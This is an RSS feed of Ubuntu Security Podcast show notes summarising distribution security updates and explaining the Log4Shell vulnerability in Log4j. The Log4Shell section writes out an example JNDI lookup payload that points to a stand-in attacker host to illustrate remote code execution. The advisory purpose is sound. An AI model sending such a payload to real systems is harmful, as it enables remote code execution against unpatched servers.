<li><a href="https://ubuntu.com/security/CVE-2020-25717">CVE-2020-25717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2124">CVE-2016-2124</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5191-1-flatpak-vulnerability-02-48">[<a href="https://ubuntu.com/security/notices/USN-5191-1">USN-5191-1</a>] Flatpak vulnerability [02:48]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41133">CVE-2021-41133</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible to escape the flatpak sandbox by tricking services running on
the host that they were not in fact communicating with a flatpak
sandboxed application but with a regular unconfined application. As such
they then wouldn&rsquo;t restrict the actions which they would perform on
behalf of the flatpak&rsquo;d application and so could allow it to then escape
it&rsquo;s own confinement</li>
</ul>
<h3 id="usn-5193-1-x-dot-org-x-server-vulnerabilities-03-26">[<a href="https://ubuntu.com/security/notices/USN-5193-1">USN-5193-1</a>] X.Org X Server vulnerabilities [03:26]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4011">CVE-2021-4011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4010">CVE-2021-4010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4009">CVE-2021-4009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4008">CVE-2021-4008</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4 different OOB writes that could be triggered by X clients - could then
cause the X server to crash or possible code execution etc</li>
<li>In more recent releases, X runs as a regular user so impact is limited,
and in most recent releases Ubuntu uses Wayland by default so it&rsquo;s
possible that on modern desktops there is no X server running at all \o/</li>
</ul>
<h3 id="usn-5192-1-apache-log4j-2-vulnerability-04-12">[<a href="https://ubuntu.com/security/notices/USN-5192-1">USN-5192-1</a>] Apache Log4j 2 vulnerability [04:12]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44228">CVE-2021-44228</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5197-1-apache-log4j-2-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5197-1">USN-5197-1</a>] Apache Log4j 2 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45046">CVE-2021-45046</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="log4shell-explodes-the-internet-04-20">Log4Shell explodes the internet [04:20]</h3>
<ul>
<li>Vuln announced on <a href="https://web.archive.org/web/20211209230040/https://twitter.com/P0rZ9/status/1468949890571337731">Twitter</a> late last Thursday / early Friday morning,
linking to the upstream Github issue of a possible remote code execution
vuln in Apache Log4j 2</li>
<li>Quickly it became apparent this was a high profile vuln that would affect
a huge number of software products and have wide reaching consequences</li>
<li>Over the weekend started being picked up by <a href="https://www.abc.net.au/news/2021-12-11/log4shell-techs-race-to-fix-software-flaw/100692876">mainstream</a> news not just the
security industry</li>
<li>Since then vendors and distros etc have scrambled to patch the
vulnerability</li>
<li>Ubuntu released updates on Monday - <code>2.15.0</code> for Ubuntu &gt;= 20.04 LTS and
otherwise removed the offending class in Ubuntu 18.04 etc (<a href="https://ubuntu.com/security/notices/USN-5192-1">USN-5192-1</a>)</li>
<li>Stepping back
<ul>
<li>What is Log4j?
<ul>
<li>Extremely popular and widely used Java package for doing logging
within applications</li>
<li>Is the 252nd most popular component in Maven Central repo by download
volume for November 2021</li>
<li>Top 0.003% in popularity by downloads</li>
<li>Also is a dependency in close to 7000 other open source projects - is
even in the <a href="https://twitter.com/TheASF/status/1400875147163279374">Mars rover&rsquo;s Ingenuity helicopter</a>
<ul>
<li>Is in most other ASF software products (Struts, Spark, Kafka, Solr etc)</li>
<li>Plus a huge number of other projects:
<ul>
<li>Elastic Search, LogStash, GrayLog2, Minecraft (client and server)
<ul>
<li>Initial reports were this was first seen being exploited in
Minecraft</li>
</ul>
</li>
</ul>
</li>
<li>Not to mention:
<ul>
<li>Apple iCloud, Steam, Samsung Cloud storage and more</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>What is the vulnerability?
<ul>
<li>Vuln is in the JNDI (Java Naming and Directory Interface) feature of log4j</li>
<li>JNDI allows Java objects to be referenced externally then loaded and used at runtime</li>
<li>JNDI supports different protocols to fetch classes, including LDAP, even DNS etc</li>
<li>Log4j supports lookups on variables which can encode a JNDI resource</li>
<li>So if you log a variable such as <code>${jndi:ldap://attacker.com/malware}</code>
Log4j will perform the lookup via LDAP to retrieve the Java class at
that URI and then execute it</li>
<li>Remote code execution attacks don&rsquo;t get any easier than this - esp
since Java is write once, run anywhere - there is no architectural
specific issues like with natively comiler languages like C/C++ etc</li>
<li>As such wasn&rsquo;t surprising to see this given the highest possible CVSS
score of 10.0 by ASF</li>
</ul>
</li>
<li>How widespread is this issue?
<ul>
<li>As mentioned earlier so many different pieces of software use Log4j
and have Log4j embedded within them, it is not just sufficient to say
update your Ubuntu packaged version of log4j - if you are running
custom / proprietary Java applications they may likely contain their
own copy of Log4j2 and you may have to go and patch that directly</li>
</ul>
</li>
<li>How to patch manually?
<ul>
<li>The easiest option would be to get an updated version of the
application from the original vendor</li>
<li>Failing that, could go looking for all log4j2 jar archives and then
could extract these (jar&rsquo;s are zips afterall) and remove the
offending class directly
(<code>java/org/apache/logging/log4j/core/lookup/JndiLookup</code>)</li>
</ul>
</li>
<li>How is it being exploited?
<ul>
<li>Kids popping Minecraft servers to other adversaries using this for
more traditional attacks like deploying cryptominers etc - but given
how widespread this issue is and how much coverage it has gotten it
is likely everyone and anyone is looking to actively exploit it</li>
</ul>
</li>
</ul>
</li>
<li>Expect we will still be hearing about this for a long time - whether due
to more vulns in Log4j2 but also since there are so many devices running
Java out there and that likely have Log4j as part of that - could be a
long tail of devices which take a long time (or even never get patched)</li>
<li>Could be the basis of the next Mirai style botnet of compromised devices?</li>
<li>In all the drama, it turned out there was a second vuln which could still
be triggered to cause a least a DoS or possible <a href="https://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data/">information leaking /
exfiltration</a> - so a second upstream release <code>2.16.0</code> was done - this is now
in Ubuntu &gt;= 20.04 LTS as well (<a href="https://ubuntu.com/security/notices/USN-5197-1">USN-5197-1</a>)</li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Log4Shell">KnowledgeBase article</a> for this on the Ubuntu wiki too if you want more
specific information</li>
</ul>
<h3 id="ubuntu-security-podcast-holiday-specials-12-52">Ubuntu Security Podcast Holiday specials [12:52]</h3>
<ul>
<li>Camila Camargo de Matos (aka mossoctopus) compiled a great 2-part series
on cyber security threats and preparations for the holidays</li>
<li>Will be publishing that over the next couple weeks whilst the regular
episodes take a break</li>
</ul>
<h3 id="ubuntu-security-podcast-on-break-13-37">Ubuntu Security Podcast on break [13:37]</h3>
<ul>
<li>Will take a break for a few weeks and be back in early January</li>
<li>Wishing all listeners a safe and happy time if you are celebrating the
holidays - fingers crossed 🤞 there is no more Log4Shell type
vulnerabilities that drop during that time and everyone can have a proper
break to recharge before 2022</li>
<li>We&rsquo;ll be back then to bring you all the news for Ubuntu Security again</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E142.mp3" length="11056963" type="audio/mpeg" /><itunes:duration>14:40</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 141
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-141/</link>
          <pubDate>Fri, 10 Dec 2021 16:27:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>b34159b8f6b641e11b148510550b33141c6a9ab53216fe87c4f0e12651aadf775ddaff407d5b4c2c5c9e48b9e9ad3df792005f1ac1fe717914cf0a1929b9acb1</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 141</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A preview of some things to come for the Ubuntu Security Podcast plus we
  cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman
  and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A preview of some things to come for the Ubuntu Security Podcast plus we
  cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman
  and more.
  </itunes:summary>
        <description>  A preview of some things to come for the Ubuntu Security Podcast plus we
  cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman
  and more.
  </description>
        <googleplay:description>  A preview of some things to come for the Ubuntu Security Podcast plus we
  cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman
  and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A preview of some things to come for the Ubuntu Security Podcast plus we
cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman
and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>38 unique CVEs addressed</p>
<h3 id="usn-5174-1-samba-vulnerabilities-00-58">[<a href="https://ubuntu.com/security/notices/USN-5174-1">USN-5174-1</a>] Samba vulnerabilities [00:58]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3671">CVE-2021-3671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25722">CVE-2020-25722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25717">CVE-2020-25717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2124">CVE-2016-2124</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Few weeks ago published Samba updates for a range of vulns - mentioned in
<a href="https://ubuntusecuritypodcast.org/episode-139/#samba-updates-available-for-testing-for-ubuntu-18-dot-04-lts-05-24">Episode 139</a> the difficulties involved in patching older Samba versions
like 4.7.6 as used in Ubuntu 18.04 - backports of patches for the more
severe vulnerabilities including the ability for authenticated attackers
to escalate privileges to root on domain machines and others</li>
</ul>
<h3 id="usn-5142-2-samba-regressions-02-06">[<a href="https://ubuntu.com/security/notices/USN-5142-2">USN-5142-2</a>] Samba regressions [02:06]</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3671">CVE-2021-3671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3738">CVE-2021-3738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23192">CVE-2021-23192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25722">CVE-2020-25722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25721">CVE-2020-25721</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25719">CVE-2020-25719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25718">CVE-2020-25718</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25717">CVE-2020-25717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2124">CVE-2016-2124</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Original upstream patches caused a bunch of regressions - once upstream
subsequently fixed these, we then updated our backports to include those
regression fixes</li>
<li>How soon to ship vuln fixes?</li>
</ul>
<h3 id="usn-5171-1-long-range-zip-vulnerabilities-03-22">[<a href="https://ubuntu.com/security/notices/USN-5171-1">USN-5171-1</a>] Long Range ZIP vulnerabilities [03:22]</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5786">CVE-2018-5786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5747">CVE-2018-5747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5650">CVE-2018-5650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11496">CVE-2018-11496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10685">CVE-2018-10685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9929">CVE-2017-9929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9928">CVE-2017-9928</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8846">CVE-2017-8846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8844">CVE-2017-8844</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Compression tool optimised to achieve better performance on larger files</li>
<li>Results of fuzzing by various researchers over time - AFL</li>
<li>4 UAFs, 2 stack buffer overflows, 2 infinite loop, 1 heap buffer overflow</li>
</ul>
<h3 id="usn-5172-1-uriparser-vulnerabilities-03-56">[<a href="https://ubuntu.com/security/notices/USN-5172-1">USN-5172-1</a>] uriparser vulnerabilities [03:56]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20721">CVE-2018-20721</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19200">CVE-2018-19200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19199">CVE-2018-19199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19198">CVE-2018-19198</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More fuzzing results -&gt; Google AutoFuzz - seems to manage oss-fuzz etc</li>
<li>OOB write, integer overflow, OOB read, NULL ptr deref</li>
</ul>
<h3 id="usn-5173-1-libmodbus-vulnerabilities-04-36">[<a href="https://ubuntu.com/security/notices/USN-5173-1">USN-5173-1</a>] libmodbus vulnerabilities [04:36]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14463">CVE-2019-14463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14462">CVE-2019-14462</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 vuln originally - OOB read on certain input - patch for this however
contained a typo which then introduced a second vuln on a subset of the
original input - second CVE assigned for that - both now fixed</li>
</ul>
<h3 id="usn-5170-1-mariadb-vulnerability-05-13">[<a href="https://ubuntu.com/security/notices/USN-5170-1">USN-5170-1</a>] MariaDB vulnerability [05:13]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-35604">CVE-2021-35604</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream point releases:
<ul>
<li>10.5.13 -&gt; 21.04, 21.10</li>
<li>10.3.32 -&gt; 20.04</li>
</ul>
</li>
<li>As usual not much details on the vuln (MariaDB fork of MySQL, maintained
by Oracle who don&rsquo;t provide a lot of specific details in their
vulnerability reports)</li>
</ul>
<h3 id="usn-5178-1-django-vulnerability-06-04">[<a href="https://ubuntu.com/security/notices/USN-5178-1">USN-5178-1</a>] Django vulnerability [06:04]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44420">CVE-2021-44420</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to handle URLs with embedded trailing newlines - newline would
cause the URL to not match the existing URL path-based access controls so
could bypass those</li>
</ul>
<h3 id="usn-5179-1-busybox-vulnerabilities-06-33">[<a href="https://ubuntu.com/security/notices/USN-5179-1">USN-5179-1</a>] BusyBox vulnerabilities [06:33]</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42386">CVE-2021-42386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42385">CVE-2021-42385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42384">CVE-2021-42384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42382">CVE-2021-42382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42381">CVE-2021-42381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42380">CVE-2021-42380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42379">CVE-2021-42379</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42378">CVE-2021-42378</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42374">CVE-2021-42374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28831">CVE-2021-28831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Busybox implements a lot of standard unix utilities in a single binary</li>
<li>UAF / OOB write when decompressing crafted gzip files</li>
<li>Heap OOB on when decompressing crafted lzma</li>
<li>Lots of UAFs in awk impl</li>
</ul>
<h3 id="usn-5180-1-mailman-vulnerability-07-37">[<a href="https://ubuntu.com/security/notices/USN-5180-1">USN-5180-1</a>] Mailman vulnerability [07:37]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44227">CVE-2021-44227</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Wouldn&rsquo;t validate that a CSRF token used for admin pages was actually
issued for that context - so a regular list user could take their own
CSRF token, craft a URL for the admin user with this token and if the
admin user visited that then they could evade the inteded CSRF
protections - so could say change the admindb password etc</li>
</ul>
<h3 id="usn-5168-4-nss-regression-08-47">[<a href="https://ubuntu.com/security/notices/USN-5168-4">USN-5168-4</a>] NSS regression [08:47]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43527">CVE-2021-43527</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Typo in backported patch could cause NSS to fail in some circumstances
and cause an SSL session to fail (DoS)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="preview-of-some-upcoming-content-and-changes-09-26">Preview of some upcoming content and changes [09:26]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E141.mp3" length="8564186" type="audio/mpeg" /><itunes:duration>10:51</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 140
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-140/</link>
          <pubDate>Fri, 03 Dec 2021 11:57:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>8ce5e011b926a8b10debe94350abf749386684f2e5127892da2f37fc236e87b53c162f2a6c4c26905d23ca25698a012f9a615f96b06f8741998ad614e453b642</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 140</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A gnarly old bug in NSS is unearthed, plus we cover security updates for
  ICU, the Linux kernel and ImageMagick as well.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A gnarly old bug in NSS is unearthed, plus we cover security updates for
  ICU, the Linux kernel and ImageMagick as well.
  </itunes:summary>
        <description>  A gnarly old bug in NSS is unearthed, plus we cover security updates for
  ICU, the Linux kernel and ImageMagick as well.
  </description>
        <googleplay:description>  A gnarly old bug in NSS is unearthed, plus we cover security updates for
  ICU, the Linux kernel and ImageMagick as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A gnarly old bug in NSS is unearthed, plus we cover security updates for
ICU, the Linux kernel and ImageMagick as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>20 unique CVEs addressed</p>
<h3 id="usn-5156-1-icu-vulnerability-00-40">[<a href="https://ubuntu.com/security/notices/USN-5156-1">USN-5156-1</a>] ICU vulnerability [00:40]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30535">CVE-2021-30535</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Double free - originally reported in chromium but is actually in embedded
copy of icu - able to be triggered on crafted content to icu, in the case
of chromium this could be via a crafted webpage or similar so not too
dissimilar to usual web handling issues - memory corruption -&gt; code
execution (but within chromium sandbox in that case)</li>
</ul>
<h3 id="usn-5158-1-imagemagick-vulnerabilities-01-25">[<a href="https://ubuntu.com/security/notices/USN-5158-1">USN-5158-1</a>] ImageMagick vulnerabilities [01:25]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20313">CVE-2021-20313</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20312">CVE-2021-20312</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20309">CVE-2021-20309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20246">CVE-2021-20246</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20244">CVE-2021-20244</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS vulns from untrusted inputs -&gt; most all result in a divide by zero -&gt;
exception -&gt; application crash</li>
</ul>
<h3 id="usn-5161-1-linux-kernel-vulnerabilities-01-55">[<a href="https://ubuntu.com/security/notices/USN-5161-1">USN-5161-1</a>] Linux kernel vulnerabilities [01:55]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42252">CVE-2021-42252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3764">CVE-2021-3764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3744">CVE-2021-3744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3655">CVE-2021-3655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.11 kernel (generic hirsute + clouds, raspi, focal hwe etc)</li>
<li>armhf specific issue (Aspeed LPC bus controller) - local user OOB write
-&gt; crash / code-exec</li>
<li>AMD cryptographic coprocessor driver memory leaks -&gt; DoS (<a href="https://ubuntusecuritypodcast.org/episode-138/">Episode 138</a>)</li>
<li>SCTP OOB read - incoming packets</li>
</ul>
<h3 id="usn-5162-1-linux-kernel-vulnerabilities-03-13">[<a href="https://ubuntu.com/security/notices/USN-5162-1">USN-5162-1</a>] Linux kernel vulnerabilities [03:13]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43057">CVE-2021-43057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42252">CVE-2021-42252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3764">CVE-2021-3764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3744">CVE-2021-3744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3655">CVE-2021-3655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 (impish, focal OEM)</li>
<li>same as above plus SELinux specific issue around handling of task
credentials -&gt; UAF -&gt; memory corruption -&gt; crash / code execution (Jann
Horn @ GPZ)</li>
</ul>
<h3 id="usn-5163-1-linux-kernel-vulnerabilities-03-59">[<a href="https://ubuntu.com/security/notices/USN-5163-1">USN-5163-1</a>] Linux kernel vulnerabilities [03:59]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3764">CVE-2021-3764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3744">CVE-2021-3744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37159">CVE-2021-37159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3655">CVE-2021-3655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (focal, bionic HWE)</li>
<li>AMD cryptographic coprocessor driver memory leaks -&gt; DoS (<a href="https://ubuntusecuritypodcast.org/episode-138/">Episode 138</a>)</li>
<li>SCTP OOB read - incoming packets</li>
<li>USB Option High Speed Mobile driver -&gt; UAF if unplug device before fully
registered - local attacker could trigger - crash / code-exec</li>
</ul>
<h3 id="usn-5164-1-linux-kernel-vulnerabilities-04-50">[<a href="https://ubuntu.com/security/notices/USN-5164-1">USN-5164-1</a>] Linux kernel vulnerabilities [04:50]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3764">CVE-2021-3764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3744">CVE-2021-3744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37159">CVE-2021-37159</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (bionic, xenial ESM, trusty ESM - azure)</li>
<li>AMD cryptographic coprocessor driver memory leaks -&gt; DoS (<a href="https://ubuntusecuritypodcast.org/episode-138/">Episode 138</a>)</li>
<li>SCTP OOB read - incoming packets</li>
</ul>
<h3 id="usn-5165-1-linux-kernel--oem--vulnerabilities-05-13">[<a href="https://ubuntu.com/security/notices/USN-5165-1">USN-5165-1</a>] Linux kernel (OEM) vulnerabilities [05:13]</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43267">CVE-2021-43267</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43056">CVE-2021-43056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42327">CVE-2021-42327</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3772">CVE-2021-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mix of vulns in various drivers
<ul>
<li>UAF in NFC, DoS due to SCTP logic error, OOB in AMD GPU debugfs (need
root), FireDTV Firewire OOB write, POWER8 specific KVM issue (guest -&gt;
host crash), Transparent Inter-Process Communication (TIPC) OOB write,
ISDN CAPI subsystem OOB write</li>
</ul>
</li>
</ul>
